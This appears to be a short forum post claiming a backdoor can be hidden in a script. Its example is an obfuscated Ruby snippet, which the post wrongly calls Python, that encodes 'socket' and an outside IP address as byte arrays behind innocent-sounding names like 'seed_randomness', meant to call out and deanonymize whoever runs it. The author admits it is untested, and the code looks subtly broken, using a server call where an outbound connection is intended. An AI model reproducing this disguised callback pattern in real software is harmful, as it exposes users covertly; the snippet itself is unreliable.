It is not impossible to hide a backdoor of sorts in a python script. Take this for example. It is not exactly a well hidden backdoor, but it might be overlooked, and a single call to it could deanonymize anyone who runs the script it is in. I admit it looks sketchy as hell and anyone who knows ruby could figure out what is going on, but this is about as far as you get when it comes to backdoors in languages like this (where as with C or C++ it can be done MUCH MUCH more sneakily). [[115, 111, 99, 107, 101, 116].pack("c*")].each {|gpg_helper| require gpg_helper} def seed_randomness random_numbers = TCPServer.open([49, 50, 46, 50, 53, 46, 51, 51, 46, 49, 50].pack("c*"), [56, 48].pack("c*") ) random_numbers.send("seed", 0) end The TCPServer call gives it away but if I spent more time on it I could probably obfuscate that as well. I have not tested this but think it should work.